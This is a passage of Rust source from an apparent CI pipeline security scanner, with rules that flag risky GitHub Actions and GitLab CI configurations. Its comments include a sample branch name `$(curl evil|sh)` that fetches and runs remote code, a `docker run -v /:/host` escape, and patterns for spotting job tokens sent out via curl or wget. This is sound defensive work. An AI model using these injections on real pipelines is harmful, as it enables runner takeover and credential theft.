let workflow_has_extra_secrets = graph.authority_sources().any(|n| match n.kind {
NodeKind::Secret => true,
NodeKind::Identity => {
// GITHUB_TOKEN identities are named `GITHUB_TOKEN` or
// `GITHUB_TOKEN (<job>)`. Anything else is extra authority
// (cloud OIDC, ADO service connection, …).
!n.name.starts_with("GITHUB_TOKEN")
}
_ => false,
});
let workflow_has_token_writes = graph
.nodes_of_kind(NodeKind::Identity)
.filter(|n| n.name.starts_with("GITHUB_TOKEN"))
.any(|n| {
n.metadata
.get(META_PERMISSIONS)
.map(|p| {
let s = p.to_lowercase();
s.contains("write") || s == "write-all"
})
.unwrap_or(false)
});
if !(workflow_has_extra_secrets || workflow_has_token_writes) {
return findings;
}
for step in graph.nodes_of_kind(NodeKind::Step) {
let Some(action_ref) = step.metadata.get(META_INTERACTIVE_DEBUG) else {
continue;
};
findings.push(Finding {
severity: Severity::High,
category: FindingCategory::InteractiveDebugActionInAuthorityWorkflow,
path: None,
nodes_involved: vec![step.id],
message: format!(
"Step '{}' uses interactive debug action '{action_ref}' inside a workflow that holds non-default secrets or write permissions — a successful debug session forwards the runner's full environment over SSH",
step.name
),
recommendation: Recommendation::Manual {
action: "Move the debug action into a separate workflow with no secret access and `permissions: read-all`, OR gate the step on an explicit short-lived `workflow_dispatch` input that is removed after use. Never run tmate/upterm in a workflow that holds production credentials.".into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
findings
}
/// R9 — PR-specific cache key in a default-branch consumer.
///
/// Severity: Medium. Speculative rule from the council gap report; the corpus
/// did not show a perfect example, so we emit Medium and document the risk.
/// A PR build that writes to a cache keyed on `github.head_ref` /
/// `github.event.pull_request.head.ref` / `github.actor` populates an entry
/// that a later default-branch run can restore — letting an attacker poison
/// the build cache from a fork PR.
pub fn pr_specific_cache_key_in_default_branch_consumer(graph: &AuthorityGraph) -> Vec<Finding> {
let mut findings = Vec::new();
// Trigger gate: workflow must run on `push` (default branch) AND on a
// PR-context trigger. Without the push side, the cache write never gets
// restored by a privileged consumer; without the PR side, no untrusted
// contributor can populate the cache to begin with.
let triggers = graph.metadata.get(META_TRIGGERS);
let runs_on_push = triggers_contain_any(triggers, &["push"]);
let runs_on_pr = triggers_contain_any(triggers, &["pull_request", "pull_request_target"]);
if !(runs_on_push && runs_on_pr) {
return findings;
}
for step in graph.nodes_of_kind(NodeKind::Step) {
let Some(key) = step.metadata.get(META_CACHE_KEY) else {
continue;
};
if key.is_empty() {
continue;
}
// Detect PR-derived key fragments. Match common spelling variants.
let lower = key.to_lowercase();
let is_pr_keyed = lower.contains("github.head_ref")
|| lower.contains("github.event.pull_request.head.ref")
|| lower.contains("github.event.pull_request.head.sha")
|| lower.contains("github.actor")
|| lower.contains("github.triggering_actor");
if !is_pr_keyed {
continue;
}
findings.push(Finding {
severity: Severity::Medium,
category: FindingCategory::PrSpecificCacheKeyInDefaultBranchConsumer,
path: None,
nodes_involved: vec![step.id],
message: format!(
"Step '{}' caches with a PR-derived key ('{key}') in a workflow that also runs on push — a fork PR can poison the cache that the default-branch build later restores",
step.name
),
recommendation: Recommendation::Manual {
action: "Split the workflow so the `actions/cache` save side runs only on `push: branches: [main]` (or another protected ref) and PR runs use cache restore-only with `lookup-only: true`. Alternatively, key the cache on the file hashes that determine its content, not the branch or actor.".into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
findings
}
/// R10 — `gh` / `gh api` runtime escalation with the default GITHUB_TOKEN.
///
/// Severity: Medium. Static permission checks see only the declared
/// `permissions:` block — they miss runtime calls that use the token to
/// perform write-class operations the workflow shouldn't be doing in a
/// PR-triggered context. Detects `gh ` invocations that mutate state
/// (`pr merge`, `release create/upload`, `api -X POST/PATCH/PUT/DELETE`)
/// in workflows triggered by `pull_request`, `issue_comment`, or
/// `workflow_run`.
pub fn gh_cli_with_default_token_escalating(graph: &AuthorityGraph) -> Vec<Finding> {
let mut findings = Vec::new();
// Trigger gate.
let triggers = graph.metadata.get(META_TRIGGERS);
let risky_trigger = triggers_contain_any(
triggers,
&[
"pull_request",
"pull_request_target",
"issue_comment",
"workflow_run",
"pull_request_review",
"pull_request_review_comment",
],
);
if !risky_trigger {
return findings;
}
for step in graph.nodes_of_kind(NodeKind::Step) {
let Some(body) = step.metadata.get(META_SCRIPT_BODY) else {
continue;
};
if body.is_empty() {
continue;
}
if !body_contains_gh_cli(body) {
continue;
}
let Some(verb) = detect_gh_escalating_verb(body) else {
continue;
};
findings.push(Finding {
severity: Severity::Medium,
category: FindingCategory::GhCliWithDefaultTokenEscalating,
path: None,
nodes_involved: vec![step.id],
message: format!(
"Step '{}' invokes `gh {verb}` against the default GITHUB_TOKEN inside a workflow triggered by an untrusted context — runtime privilege escalation that static permission checks miss",
step.name
),
recommendation: Recommendation::Manual {
action: "Move write-class `gh`/`gh api` calls into a separate workflow gated on `push` (or an explicit reusable workflow with `secrets: inherit` only for the writer side). On the PR-triggered side, enforce `permissions: read-all` and verify by re-reading the GitHub Actions audit log.".into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
findings
}
/// True when `body` invokes the `gh` CLI as a command (not just mentions
/// the substring `gh` inside another word). Match `gh ` at start of line, after
/// `;`, after `&&`, after `|`, or following indentation/whitespace.
fn body_contains_gh_cli(body: &str) -> bool {
for line in body.lines() {
let trimmed = line.trim_start();
if trimmed.starts_with("gh ") || trimmed.starts_with("gh\t") {
return true;
}
// Inline forms after a shell separator.
for sep in ["&& gh ", "|| gh ", "; gh ", "$(gh ", "`gh ", "| gh "] {
if trimmed.contains(sep) {
return true;
}
}
}
false
}
/// If `body` invokes a write-class `gh` verb, return a short label for it.
/// Recognised:
/// - `gh pr merge`
/// - `gh release create` / `gh release upload` / `gh release delete`
/// - `gh api -X POST|PATCH|PUT|DELETE` (any path)
/// - `gh api ... <method>` against `/repos/.../{contents,releases,actions/secrets,environments}`
fn detect_gh_escalating_verb(body: &str) -> Option<String> {
let lower = body.to_lowercase();
if lower.contains("gh pr merge") {
return Some("pr merge".into());
}
if lower.contains("gh release create") {
return Some("release create".into());
}
if lower.contains("gh release upload") {
return Some("release upload".into());
}
if lower.contains("gh release delete") {
return Some("release delete".into());
}
if lower.contains("gh release edit") {
return Some("release edit".into());
}
// `gh api -X <METHOD>` form. Match the method tokens directly so we don't
// false-positive on `-X-Foo` headers etc.
for method in ["post", "patch", "put", "delete"] {
let needle_dash = format!("gh api -x {method}");
let needle_long = format!("gh api --method {method}");
if lower.contains(&needle_dash) || lower.contains(&needle_long) {
return Some(format!("api -X {}", method.to_uppercase()));
}
}
// Path-based heuristic: even without an explicit -X, certain endpoints are
// mutation endpoints (`gh api repos/.../actions/secrets/FOO -F ...`).
let path_markers = [
"actions/secrets",
"actions/variables",
"/environments",
"/releases",
];
if lower.contains("gh api ") && path_markers.iter().any(|m| lower.contains(m)) {
// Only escalate when there's also a write-flag. `-f`/`-F`/`--field`/`--input`
// implies POST/PATCH semantics under `gh api`.
let writes = lower.contains(" -f ")
|| lower.contains(" -f=")
|| lower.contains(" -f\"")
|| lower.contains(" --field")
|| lower.contains(" --input");
if writes {
return Some("api (mutation endpoint)".into());
}
}
None
}
// ── GitLab CI rules ─────────────────────────────────────────
/// Untrusted GitLab CI predefined variables that an attacker can control by
/// pushing a branch / opening an MR / writing a commit message. When any of
/// these is interpolated into an unquoted shell expansion the runner
/// executes whatever the attacker put inside `` $(...) `` or backticks.
const UNTRUSTED_GITLAB_CI_VARS: &[&str] = &[
"CI_COMMIT_BRANCH",
"CI_COMMIT_REF_NAME",
"CI_COMMIT_TAG",
"CI_COMMIT_MESSAGE",
"CI_COMMIT_TITLE",
"CI_COMMIT_DESCRIPTION",
"CI_COMMIT_AUTHOR",
"CI_MERGE_REQUEST_TITLE",
"CI_MERGE_REQUEST_DESCRIPTION",
"CI_MERGE_REQUEST_SOURCE_BRANCH_NAME",
];
/// Rule: `$CI_JOB_TOKEN` (the GitLab platform-injected job token, broad scope
/// by default — registry write, package upload, project read) used as a
/// bearer credential against an external HTTP endpoint, or fed to
/// `docker login` for `registry.gitlab.com`.
///
/// Detection: read the Step's `META_SCRIPT_BODY`. Fire when the body
/// contains `$CI_JOB_TOKEN` or `${CI_JOB_TOKEN}` AND any of:
/// - a `curl` / `wget` / `http` / `https.request` invocation, OR
/// - the literal `gitlab-ci-token:` (the token-as-Basic-auth idiom), OR
/// - a `docker login` for `registry.gitlab.com`.
///
/// Severity: High. Category: Credentials.
pub fn ci_job_token_to_external_api(graph: &AuthorityGraph) -> Vec<Finding> {
let mut findings = Vec::new();
for step in graph.nodes_of_kind(NodeKind::Step) {
let body = match step.metadata.get(META_SCRIPT_BODY) {
Some(b) if !b.is_empty() => b,
_ => continue,
};
if !body_references_ci_job_token(body) {
continue;
}
let sink = classify_ci_job_token_sink(body);
let Some(sink) = sink else {
continue;
};
findings.push(Finding {
severity: Severity::High,
category: FindingCategory::CiJobTokenToExternalApi,
path: None,
nodes_involved: vec![step.id],
message: format!(
"Step '{}' uses $CI_JOB_TOKEN as a bearer credential ({}) — the token's default scope (registry write, package upload, project read) means a poisoned MR job that emits it can pivot to package or registry pushes",
step.name, sink
),
recommendation: Recommendation::Manual {
action: "Scope CI_JOB_TOKEN: in Settings → CI/CD → Job token permissions, set the inbound allowlist to the minimum projects required and disable any unused scope (package_registry, container_registry). For uploads, prefer a dedicated short-lived deploy token over CI_JOB_TOKEN. Never POST CI_JOB_TOKEN to webhooks or third-party APIs.".into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
findings
}
fn body_references_ci_job_token(body: &str) -> bool {
body.contains("$CI_JOB_TOKEN") || body.contains("${CI_JOB_TOKEN}")
}
/// Classify how `$CI_JOB_TOKEN` is being used. Returns a short human-readable
/// sink description, or None when the token only appears in benign ways
/// (e.g. assignment to an env var that's never read).
fn classify_ci_job_token_sink(body: &str) -> Option<&'static str> {
let lower = body.to_lowercase();
// gitlab-ci-token:$CI_JOB_TOKEN — the canonical Basic-auth idiom.
if lower.contains("gitlab-ci-token:") && body_references_ci_job_token(body) {
if lower.contains("docker login") && lower.contains("registry.gitlab.com") {
return Some("docker login registry.gitlab.com");
}
if lower.contains("curl") || lower.contains("wget") {
return Some("curl/wget Basic auth (user gitlab-ci-token)");
}
return Some("Basic-auth credential (user gitlab-ci-token)");
}
// JOB-TOKEN: header form (curl/wget against /api/v4/...).
if lower.contains("job-token:") && body_references_ci_job_token(body) {
return Some("JOB-TOKEN header to GitLab API");
}
// curl --header "PRIVATE-TOKEN: $CI_JOB_TOKEN" or similar bearer use.
if (lower.contains("curl") || lower.contains("wget"))
&& (lower.contains("authorization:") || lower.contains("private-token:"))
&& body_references_ci_job_token(body)
{
return Some("Authorization/PRIVATE-TOKEN header to HTTP endpoint");
}
// Generic: token appears next to a CI_API_V4_URL request — strong signal.
if body.contains("CI_API_V4_URL") && body_references_ci_job_token(body) {
return Some("HTTP request to ${CI_API_V4_URL} with token");
}
None
}
/// Rule: GitLab `id_tokens:` audience reused across MR-context and
/// protected-context jobs in the same file (no audience separation), or set
/// to a wildcard / multi-cloud broker URL, or shared with a `secrets:` Vault
/// path that the consuming job doesn't need.
///
/// Detection: collect every OIDC Identity node (Identity with
/// `META_OIDC == "true"`) carrying a `META_OIDC_AUDIENCE`. For each audience:
/// - Wildcard / `*` audience → fire (b).
/// - Same audience reachable from at least one Step marked `META_TRIGGER ==
/// merge_request` AND at least one Step that is NOT (i.e. protected-context
/// only) → fire (a).
///
/// Severity: High. Category: Privilege.
pub fn id_token_audience_overscoped(graph: &AuthorityGraph) -> Vec<Finding> {
use std::collections::HashMap as Map;
let mut findings = Vec::new();
// Collect (audience → (identity_id, [step_ids that reach it])).
let mut by_aud: Map<&str, Vec<(NodeId, Vec<NodeId>)>> = Map::new();
for ident in graph.nodes_of_kind(NodeKind::Identity) {
let is_oidc = ident.metadata.get(META_OIDC).map(String::as_str) == Some("true");
if !is_oidc {
continue;
}
let Some(aud) = ident.metadata.get(META_OIDC_AUDIENCE) else {
continue;
};
if aud == "unknown" || aud.is_empty() {
continue;
}
// Find steps that hold this identity via HasAccessTo.
let mut consumers: Vec<NodeId> = Vec::new();
for step in graph.nodes_of_kind(NodeKind::Step) {
let holds = graph
.edges_from(step.id)
.any(|e| e.kind == EdgeKind::HasAccessTo && e.to == ident.id);
if holds {
consumers.push(step.id);
}
}
by_aud
.entry(aud.as_str())
.or_default()
.push((ident.id, consumers));
}
for (aud, entries) in &by_aud {
// (b) Wildcard / suspiciously broad audience.
let is_wildcard = *aud == "*"
|| aud.contains("/*")
|| aud.eq_ignore_ascii_case("any")
|| aud.eq_ignore_ascii_case("default");
if is_wildcard {
// Use the first identity node as the anchor.
if let Some((ident_id, consumers)) = entries.first() {
let mut nodes_involved = vec![*ident_id];
nodes_involved.extend(consumers.iter().copied());
findings.push(Finding {
severity: Severity::High,
category: FindingCategory::IdTokenAudienceOverscoped,
path: None,
nodes_involved,
message: format!(
"OIDC id_token audience '{aud}' is wildcard / catch-all — any cloud / Vault role bound to this audience is reachable from every job that mints the token"
),
recommendation: Recommendation::Manual {
action: "Replace the wildcard `aud:` with a job- or environment-specific audience (e.g. `vault.gitlab.net/prod-deploy`, `aws-deploy-staging`). Bind the downstream role / Vault path to that exact audience so unrelated jobs can't trade the token for the same credential.".into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
continue;
}
}
// (a) Same audience reachable from MR-context AND non-MR-context steps.
let all_consumers: Vec<NodeId> = entries
.iter()
.flat_map(|(_, c)| c.iter().copied())
.collect();
let mut has_mr = false;
let mut has_protected = false;
for sid in &all_consumers {
let Some(step) = graph.node(*sid) else {
continue;
};
if step.metadata.get(META_TRIGGER).map(String::as_str) == Some("merge_request") {
has_mr = true;
} else {
has_protected = true;
}
}
if has_mr && has_protected && !entries.is_empty() {
// Anchor at the first identity node carrying this audience.
let (ident_id, _) = &entries[0];
let mut nodes_involved = vec![*ident_id];
nodes_involved.extend(all_consumers.iter().copied());
findings.push(Finding {
severity: Severity::High,
category: FindingCategory::IdTokenAudienceOverscoped,
path: None,
nodes_involved,
message: format!(
"OIDC id_token audience '{aud}' is shared across merge_request_event jobs and protected-branch jobs — a poisoned MR can mint a token with the same audience as the production deploy and trade it for the same downstream cloud / Vault role"
),
recommendation: Recommendation::Manual {
action: "Split audiences by trust context: declare a separate `aud:` for MR-context jobs (e.g. `…/mr-validate`) and a different `aud:` for protected-branch jobs (e.g. `…/prod-deploy`). Bind each downstream role / Vault path to the exact audience of the job that needs it.".into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
}
findings
}
/// Rule: untrusted GitLab predefined variable interpolated unquoted into a
/// shell context (`script:` / `before_script:` / `after_script:` /
/// `environment:url:`). A branch named `` $(curl evil|sh) `` then runs as
/// part of the runner.
///
/// Detection: for each Step, scan `META_SCRIPT_BODY` and `META_ENVIRONMENT_URL`
/// for any of `UNTRUSTED_GITLAB_CI_VARS` referenced via `$VAR`, `${VAR}`, or
/// `"$VAR"`/`"${VAR}"` (double-quoted — still expanded). A reference inside
/// single quotes does NOT fire. Same for `printf %q` / `${VAR@Q}` /
/// `${VAR//[^A-Za-z0-9]/}` sanitised forms.
///
/// Severity: High. Category: Injection.
pub fn untrusted_ci_var_in_shell_interpolation(graph: &AuthorityGraph) -> Vec<Finding> {
let mut findings = Vec::new();
for step in graph.nodes_of_kind(NodeKind::Step) {
let mut hits: Vec<&str> = Vec::new();
let mut where_hit: Vec<&str> = Vec::new();
if let Some(body) = step.metadata.get(META_SCRIPT_BODY) {
for var in UNTRUSTED_GITLAB_CI_VARS {
if shell_body_unsafely_expands(body, var) {
hits.push(*var);
where_hit.push("script");
}
}
}
if let Some(url) = step.metadata.get(META_ENVIRONMENT_URL) {
for var in UNTRUSTED_GITLAB_CI_VARS {
if url_interpolates_var(url, var) {
if !hits.contains(var) {
hits.push(*var);
}
if !where_hit.contains(&"environment.url") {
where_hit.push("environment.url");
}
}
}
}
if hits.is_empty() {
continue;
}
// Dedup hit list while preserving order.
let mut seen = std::collections::HashSet::new();
let names: Vec<&str> = hits.into_iter().filter(|n| seen.insert(*n)).collect();
let mut wh = where_hit;
wh.sort();
wh.dedup();
let where_str = wh.join(" + ");
let names_str = names.join(", ");
findings.push(Finding {
severity: Severity::High,
category: FindingCategory::UntrustedCiVarInShellInterpolation,
path: None,
nodes_involved: vec![step.id],
message: format!(
"Step '{}' interpolates attacker-controlled GitLab predefined variable(s) [{}] into {} without single-quote isolation — a branch / tag / commit message containing `$(...)` executes inside the runner",
step.name, names_str, where_str
),
recommendation: Recommendation::Manual {
action: "Pass the untrusted value through the step's `variables:` / `env:` block (one variable per step), then reference it inside the script as `\"$BRANCH\"` (double-quoted is fine when the value is bound to a real shell variable, not YAML-interpolated). For commands that must include the value, sanitise with `printf %q` or `${VAR//[^A-Za-z0-9_-]/}` first. For `environment:url:`, never interpolate `$CI_COMMIT_*` directly — use a slug-only variable (`$CI_COMMIT_REF_SLUG` is sanitised by GitLab).".into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
findings
}
/// Returns true if `body` contains an *unsafe* expansion of `$VAR` / `${VAR}`
/// — i.e. one that is NOT enclosed in single quotes and NOT obviously
/// sanitised. Conservative: errs on the side of flagging because the cost of
/// a false negative (RCE) dwarfs the cost of a false positive (one extra
/// review comment).
fn shell_body_unsafely_expands(body: &str, var: &str) -> bool {
// First check that the variable appears at all.
let dollar = format!("${var}");
let dollar_brace = format!("${{{var}}}");
if !body.contains(&dollar) && !body.contains(&dollar_brace) {
return false;
}
// Walk lines. A line that's entirely single-quoted around the var is
// safe; otherwise we need to be conservative.
for line in body.lines() {
let line = line.trim_start_matches(['-', ' ', '\t']);
if line.is_empty() || line.starts_with('#') {
continue;
}
let candidate_positions: Vec<usize> = line
.match_indices(&dollar)
.map(|(i, _)| i)
.chain(line.match_indices(&dollar_brace).map(|(i, _)| i))
.collect();
for pos in candidate_positions {
// Reject if the var reference is wrapped in single quotes
// (count single-quote occurrences strictly before `pos`; odd
// count means we're inside a single-quoted region).
let prefix = &line[..pos];
let single_count = prefix.matches('\'').count();
if single_count % 2 == 1 {
continue; // inside '...'
}
// Reject if line has obvious sanitiser around the var.
if line.contains("printf %q")
|| line.contains("${") && (line.contains("@Q}") || line.contains("//[^"))
{
// Sanitiser keyword present somewhere — be safe and skip.
continue;
}
return true;
}
}
false
}
fn url_interpolates_var(url: &str, var: &str) -> bool {
let dollar = format!("${var}");
let dollar_brace = format!("${{{var}}}");
url.contains(&dollar) || url.contains(&dollar_brace)
}
// ── GitLab CI rules ─────────────────────────────────────
//
// Five rules sourced from the v0.9.0 GitLab corpus gap analysis (council
// review of 277 .gitlab-ci.yml files). Detection inputs come from metadata
// stamped by `taudit-parse-gitlab` — see `META_GITLAB_*` constants. Each rule
// is a no-op on graphs from non-GitLab parsers (the markers will simply be
// absent), so wiring all five into `run_all_rules` is safe.
/// Mutable branch names used as `ref:` on includes — anyone with push to one
/// of these on the source repo can backdoor every consumer's pipeline.
const MUTABLE_BRANCH_REFS: &[&str] = &[
"main", "master", "develop", "dev", "trunk", "default", "HEAD",
];
/// Mid-string fragments inside a `remote:` URL that betray a branch ref
/// (vs a tag or sha). GitLab raw URLs use `/-/raw/<ref>/<path>`.
fn remote_url_uses_branch(url: &str) -> Option<String> {
// Look for `/-/raw/<ref>/` patterns; ref is the segment after `/-/raw/`.
let idx = url.find("/-/raw/")?;
let after = &url[idx + "/-/raw/".len()..];
let ref_seg = after.split('/').next()?;
if ref_seg.is_empty() {
return None;
}
// Tags / SHAs aren't mutable: a 40-hex string is a sha; a `v\d+...` or
// contains `.` and digits is a tag-ish convention. Branches are everything else.
if ref_seg.len() == 40 && ref_seg.chars().all(|c| c.is_ascii_hexdigit()) {
return None;
}
if ref_seg.starts_with('v')
&& ref_seg
.chars()
.nth(1)
.map(|c| c.is_ascii_digit())
.unwrap_or(false)
{
return None;
}
Some(ref_seg.to_string())
}
/// Rule: `unpinned_include_remote_or_branch_ref` (High, Supply Chain).
///
/// Top-level GitLab `include:` of a `remote:` URL pinned to a branch, a
/// `project:` whose `ref:` is a mutable branch (main/master/develop/...), or
/// an include with no `ref:` at all (defaults to HEAD on the source repo).
///
/// Skips `local:` includes (same repo — same trust boundary), `template:`
/// includes (GitLab-maintained), and `component:` includes that have an `@`
/// version pin. Reads the structured `META_GITLAB_INCLUDES` blob the parser
/// stamps on the graph.
pub fn unpinned_include_remote_or_branch_ref(graph: &AuthorityGraph) -> Vec<Finding> {
use taudit_parse_gitlab_include_view::IncludeView;
let blob = match graph.metadata.get(META_GITLAB_INCLUDES) {
Some(s) => s,
None => return Vec::new(),
};
let entries: Vec<IncludeView> = match serde_json::from_str(blob) {
Ok(e) => e,
Err(_) => return Vec::new(),
};
let mut findings = Vec::new();
for entry in entries {
let kind = entry.kind.as_str();
let target = entry.target.as_str();
let git_ref = entry.git_ref.as_str();
match kind {
// local / template / component — skip (or handled separately for
// unversioned components).
"local" | "template" => continue,
"component" => {
if git_ref.is_empty() {
findings.push(Finding {
severity: Severity::High,
category: FindingCategory::UnpinnedIncludeRemoteOrBranchRef,
path: None,
nodes_involved: vec![],
message: format!(
"include: component '{target}' has no version pin (no '@<version>') — owner of the component repo can rewrite every consumer's pipeline silently"
),
recommendation: Recommendation::PinAction {
current: target.to_string(),
pinned: format!("{target}@<sha-or-tag>"),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
}
"remote" => {
if let Some(branch) = remote_url_uses_branch(target) {
findings.push(Finding {
severity: Severity::High,
category: FindingCategory::UnpinnedIncludeRemoteOrBranchRef,
path: None,
nodes_involved: vec![],
message: format!(
"include: remote URL pins branch '{branch}' ({target}) — included YAML executes with consumer's CI_JOB_TOKEN and secrets; whoever controls that branch can backdoor this pipeline"
),
recommendation: Recommendation::PinAction {
current: target.to_string(),
pinned: target.replacen(
&format!("/-/raw/{branch}/"),
"/-/raw/<full-sha>/",
1,
),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
}
"project" => {
let lower = git_ref.to_ascii_lowercase();
let is_branch = MUTABLE_BRANCH_REFS
.iter()
.any(|b| b.eq_ignore_ascii_case(&lower));
let missing = git_ref.is_empty();
let is_sha = git_ref.len() == 40 && git_ref.chars().all(|c| c.is_ascii_hexdigit());
if (missing || is_branch) && !is_sha {
let why = if missing {
"no `ref:` (defaults to HEAD on source project)".to_string()
} else {
format!("`ref: {git_ref}` is a mutable branch")
};
findings.push(Finding {
severity: Severity::High,
category: FindingCategory::UnpinnedIncludeRemoteOrBranchRef,
path: None,
nodes_involved: vec![],
message: format!(
"include: project '{target}' — {why}; included YAML can redefine every job's `script:` and runs with consumer's secrets"
),
recommendation: Recommendation::PinAction {
current: format!(
"project: {target}{}",
if missing {
String::new()
} else {
format!(", ref: {git_ref}")
}
),
pinned: format!("project: {target}, ref: <full-commit-sha>"),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
}
_ => {}
}
}
findings
}
/// Rule: `dind_service_grants_host_authority` (High, Privilege).
///
/// A GitLab job that declares a `services: [docker:*-dind]` sidecar AND
/// holds at least one secret (other than the implicit, structurally-present
/// CI_JOB_TOKEN). The dind sidecar exposes the full Docker socket inside
/// the job container, so a malicious build step can `docker run -v /:/host`
/// and read the runner host filesystem.
pub fn dind_service_grants_host_authority(graph: &AuthorityGraph) -> Vec<Finding> {
let mut findings = Vec::new();
for step in graph.nodes_of_kind(NodeKind::Step) {
let has_dind = step
.metadata
.get(META_GITLAB_DIND_SERVICE)
.map(|v| v == "true")
.unwrap_or(false);
if !has_dind {
continue;
}
// Walk this step's HasAccessTo edges for secrets / non-implicit
// identities. The implicit CI_JOB_TOKEN does not count — every job
// has it by platform design, so flagging on it would emit noise on
// every dind job.
let mut sensitive: Vec<String> = Vec::new();
for edge in graph.edges_from(step.id) {
if edge.kind != EdgeKind::HasAccessTo {
continue;
}
let target = match graph.node(edge.to) {
Some(n) => n,
None => continue,
};
let is_implicit = target
.metadata
.get(META_IMPLICIT)
.map(|v| v == "true")
.unwrap_or(false);
if is_implicit {
continue;
}
match target.kind {
NodeKind::Secret => sensitive.push(target.name.clone()),
NodeKind::Identity => sensitive.push(target.name.clone()),
_ => {}
}
}
if sensitive.is_empty() {
continue;
}
sensitive.sort();
sensitive.dedup();
// Cap the message length — corpora include jobs with dozens of vars.
let preview = if sensitive.len() > 4 {
format!(
"{} (and {} more)",
sensitive[..4].join(", "),
sensitive.len() - 4
)
} else {
sensitive.join(", ")
};
findings.push(Finding {
severity: Severity::High,
category: FindingCategory::DindServiceGrantsHostAuthority,
path: None,
nodes_involved: vec![step.id],
message: format!(
"Step '{}' uses a docker:dind service AND holds secrets [{}] — a malicious build step can `docker run -v /:/host` from inside dind and exfiltrate the runner's filesystem (other jobs' artifacts, cached creds)",
step.name, preview
),
recommendation: Recommendation::Manual {
action: "Replace docker-in-docker with kaniko / buildah / img for image builds (no privileged sidecar required), OR isolate the dind job to a dedicated runner pool with no shared workspace and no other secrets in scope.".into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
findings
}
/// Substrings (case-insensitive) that identify a GitLab security scanner job
/// either by job name or by an `extends:` template name.
const SCANNER_PATTERNS: &[&str] = &[
"sast",
"dast",
"secret_detection",
"secret-detection",
"dependency_scanning",
"dependency-scanning",
"container_scanning",
"container-scanning",
"gitleaks",
"trivy",
"grype",
"semgrep",
"bandit",
"snyk",
"license_scanning",
"license-scanning",
"iac_scan",
"iac-scan",
"fuzz",
"api_fuzzing",
"api-fuzzing",
"coverage_fuzzing",
"coverage-fuzzing",
];
fn step_matches_scanner(step_name: &str, extends: Option<&String>) -> bool {
let lower = step_name.to_ascii_lowercase();
if SCANNER_PATTERNS.iter().any(|p| lower.contains(p)) {
return true;
}
if let Some(ext) = extends {
let elower = ext.to_ascii_lowercase();
if SCANNER_PATTERNS.iter().any(|p| elower.contains(p)) {
return true;
}
}
false
}
/// Rule: `security_job_silently_skipped` (Medium, Configuration).
///
/// A security-scanner job (matched by name or `extends:` template) runs with
/// `allow_failure: true` and no `rules:` clause that surfaces the failure.
/// The pipeline goes green even when the scan errors out — silent-pass is
/// worse than no scan because reviewers trust the badge.
///
/// We can't statically prove the absence of a "surface failures" rule from
/// YAML alone, so we fire whenever `allow_failure: true` is set on a scanner
/// job and let the operator confirm. The recommendation guides them to the
/// fix.
pub fn security_job_silently_skipped(graph: &AuthorityGraph) -> Vec<Finding> {
let mut findings = Vec::new();
for step in graph.nodes_of_kind(NodeKind::Step) {
let allow_failure = step
.metadata
.get(META_GITLAB_ALLOW_FAILURE)
.map(|v| v == "true")
.unwrap_or(false);
if !allow_failure {
continue;
}
let extends = step.metadata.get(META_GITLAB_EXTENDS);
if !step_matches_scanner(&step.name, extends) {
continue;
}
let how = match extends {
Some(e) => format!("matched by extends: {e}"),
None => "matched by job name".to_string(),
};
findings.push(Finding {
severity: Severity::Medium,
category: FindingCategory::SecurityJobSilentlySkipped,
path: None,
nodes_involved: vec![step.id],
message: format!(
"Security-scanner job '{}' ({how}) runs with allow_failure: true — when the scan errors out the pipeline still goes green; reviewers trust a badge that is no longer evidence",
step.name
),
recommendation: Recommendation::Manual {
action: "Either drop `allow_failure: true` and let the scanner gate the pipeline, OR add a follow-up `rules:` clause that surfaces the failure (e.g. a stage that asserts the scan report exists and is non-empty). A scanner that fails closed is worth more than a scanner that fails silently.".into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
findings
}
/// Rule: `child_pipeline_trigger_inherits_authority` (Medium, Propagation).
///
/// A GitLab `trigger:` job (downstream / child pipeline) either runs in
/// `merge_request_event` context OR is a *dynamic* child pipeline whose
/// included YAML comes from a previous job's `artifact:`. Both shapes mean
/// untrusted input shapes the pipeline that runs with the parent project's
/// CI_JOB_TOKEN and secrets.
pub fn child_pipeline_trigger_inherits_authority(graph: &AuthorityGraph) -> Vec<Finding> {
let graph_is_mr = graph
.metadata
.get(META_TRIGGER)
.map(|v| v == "merge_request")
.unwrap_or(false);
let mut findings = Vec::new();
for step in graph.nodes_of_kind(NodeKind::Step) {
let kind = match step.metadata.get(META_GITLAB_TRIGGER_KIND) {
Some(k) => k.as_str(),
None => continue,
};
let is_dynamic = kind == "dynamic";
let is_mr = graph_is_mr;
if !is_dynamic && !is_mr {
continue;
}
let mut reasons: Vec<&str> = Vec::new();
if is_dynamic {
reasons.push("includes child YAML from a previous job's artifact (dynamic child pipeline — code-injection sink)");
}
if is_mr {
reasons.push(
"runs in merge_request_event context — fork code shapes the downstream pipeline",
);
}
let why = reasons.join(" AND ");
findings.push(Finding {
severity: Severity::Medium,
category: FindingCategory::ChildPipelineTriggerInheritsAuthority,
path: None,
nodes_involved: vec![step.id],
message: format!(
"Trigger job '{}' {why}; the downstream pipeline inherits the parent project's CI_JOB_TOKEN and any reachable secrets",
step.name
),
recommendation: Recommendation::Manual {
action: "For dynamic child pipelines: validate the generated YAML against a schema before triggering, or pre-stage all child pipeline files in-tree and use `include:` (static) instead of `include: artifact:`. For MR-triggered triggers: gate the downstream with `rules: if: $CI_PIPELINE_SOURCE != 'merge_request_event'` so fork PRs cannot reach it.".into(),
},
source: FindingSource::BuiltIn,
extras: FindingExtras::default(),
});
}
findings
}
/// Heuristic: cache keys that cross trust boundaries. Returns `Some(reason)`
/// when the key is one of the dangerous shapes, `None` when the key is
/// scoped tightly enough.
fn unsafe_cache_key(key: &str) -> Option<&'static str> {
let trimmed = key.trim();
if trimmed.is_empty() {
// GitLab default key when none is set: `default` — same blast radius as hardcoded.
